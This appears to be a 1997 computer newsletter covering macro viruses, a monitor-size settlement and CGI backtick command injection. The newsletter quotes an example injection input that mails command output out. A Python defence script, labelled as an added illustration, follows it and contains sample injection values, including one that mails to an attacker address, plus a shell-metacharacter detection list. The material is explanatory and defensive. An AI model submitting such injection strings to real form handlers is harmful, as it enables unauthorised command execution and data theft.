Computer Knowledge Newsletter – April 1997 Issue

In This Issue:

Virus News

There are over 500 macro viruses now. These have quickly become by far the most widespread virus problem since viruses first appeared a dozen years ago. There are, however, two ways to virtually guarantee you won’t be infected:

  • Use programs that don’t store macros in the actual data file and/or don’t make macros easy to transmit between computers. Right now, the WordPerfect suite would be the choice (but beware, rumor has it WordPerfect is being changed to store macros in documents; if that happens expect problems with that program as well if they don’t put in anti-virus code).
  • Transmit documents in a format that does not carry macros. I do not open Word documents from anyone else in Word; I read them using the Word Viewer (which does not use macros). If I must edit a Word document from someone else I insist on getting it in Rich Text Format (RTF). This format retains all the formatting but does not store macros. When I transmit documents to others I use RTF as well to show I care. [Update: RTF is capable of directly encoding embedded objects for delivery via that format so if an infected object is embedded into the RTF this format can carry viruses.]

This may seem a bit paranoid, but these simple precautions give great peace of mind and are not at all inconvenient; the translations are transparent.

General Security

If you have a web site or run a server, there is a weakness in CGI scripting that you should be aware of. It involves the backward single quote symbol (`). On many systems, UNIX shell commands enclosed in backward single quotes are executed before the command line they are embedded in is executed. The output of the embedded command is then substituted into the original command line, and the whole is executed.

Why is this a problem? It’s possible to enter system commands into forms using this technique and hack into systems. One example commonly given would have you enter “`who|mail your.mail@address`” into the E-mail address block on a form. When the UNIX server processes the E-mail address response, instead of just noting your address it runs the UNIX who command and then mails the output to you at your E-mail address. In short, you get a list of everyone logged into that UNIX server at that particular time. Of course, other more problematic commands could be used instead.

Before you allow form input to be processed by any of your CGI scripts be certain you strip out any backward quote characters as a precaution.
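The following Python script is an added illustration, not code from the newsletter, of why the backtick is dangerous and of what the precaution above does and does not cover. It contrasts the 1997-style construction (form data pasted into a shell command line, shown but never executed) with two defensive controls: an allowlist check on what an e-mail address may look like, and running the downstream program with an argument list so that no shell ever parses the value. The sample submissions, the address pattern and the `mail` stand-in (a Python one-liner, since `mail` is not assumed to be installed) are all constructed here; note that a `$( )` or `;` form reaches the same effect as the backtick, so stripping one character is not a complete fix.

```python
import re
import shlex
import subprocess
import sys

# Constructed form submissions for the demonstration. "backtick" is the
# newsletter's trick; "dollar" and "semicolon" reach the same effect
# without a single backtick, which is why removing "`" alone is not enough.
SUBMISSIONS = {
    "honest":    "alice@example.com",
    "backtick":  "`who|mail attacker@example.com`",
    "dollar":    "$(who)@example.com",
    "semicolon": "x@example.com; who",
}

# Allowlist for what an address may look like; anything else is rejected.
ADDRESS_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

# Shell metacharacters that let form data turn into commands under /bin/sh.
SHELL_META = set("`$;|&<>()\n")


def vulnerable_command(address):
    """The 1997-style construction: form data interpolated straight into a
    shell command line. Returned as a string and never executed here."""
    return "echo 'Thanks for writing' | mail " + address


def strip_backticks(address):
    """The newsletter's precaution on its own: removes the backtick but
    leaves $( ), ; and | untouched."""
    return address.replace("`", "")


def contains_shell_meta(text):
    """Detection check: does the submission carry any shell metacharacter?"""
    return any(ch in SHELL_META for ch in text)


def is_safe_address(address):
    """Allowlist validation: the whole string must match the address pattern."""
    return ADDRESS_RE.fullmatch(address) is not None


def run_without_shell(address):
    """Pass the value as one argv element with no shell in between. The
    child (a Python one-liner standing in for `mail`) receives the text
    literally, so ` $( ; | are just characters to it."""
    result = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1])", address],
        capture_output=True, text=True, check=True)
    return result.stdout.rstrip("\n")


def hardened_notify(address):
    """Defence in depth: validate first, then avoid the shell entirely."""
    if not is_safe_address(address):
        raise ValueError("rejected form input: " + repr(address))
    return run_without_shell(address)


def quoted_for_shell(address):
    """If a shell really is unavoidable, shlex.quote wraps the whole value
    in single quotes so the shell treats it as one literal word."""
    return shlex.quote(address)


if __name__ == "__main__":
    for label, value in SUBMISSIONS.items():
        print(f"{label:10} meta={contains_shell_meta(value)!s:5} "
              f"safe={is_safe_address(value)!s:5} "
              f"after-strip={strip_backticks(value)!r}")
```

Run as a script, the table shows that only the honest address passes the allowlist and that the `$(who)` submission is unchanged by backtick stripping; `run_without_shell("`who`")` returns the literal text rather than a list of logged-in users, because no shell was given the chance to substitute it.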

Miscellaneous

The internet is an interesting place. I logged into mail one day this past month and there, waiting for me, was a message from an Air Force buddy from thirty years ago, long ago lost. You just never know what’s going to pop up from day to day.

For US readers, you should be aware that the lawyers have been at it again, but you might get the proverbial “free lunch” because of it.

For some time computer and monitor makers routinely advertised the diagonal on a monitor as the size of the monitor (the same way TV sets are advertised). Some enterprising soul noted that while TV sets have a picture that goes to the edge of the screen, computer monitors do not; they have a typically smaller viewing area due to a mask. This soul was convinced this amounted to false advertising and got a group of lawyers to file a class action suit against many, many monitor and computer makers. A settlement was reached. Some refunds are in order and you may have noted that all ads now say something like xx-inches viewable size.

The long and short of it is that if you purchased a monitor or computer with monitor between 1 May 1991 and 1 May 1995 you are likely entitled to a refund of a portion of your purchase price. How much? If you have not replaced the monitor you get $6. If you replace the monitor between 7 September 1997 and three years from then you can get $13. It looks like there is a $30 limit for any one person as well.

Details have been published in a number of computer publications and are available by calling (800) 789-0311 or visiting the web site:

http://www.computermonitorcases.com

Oh yes, in case you were wondering, the legal firm got $5.8 million plus up to another quarter million dollars for actual expenses. Enjoy your $6.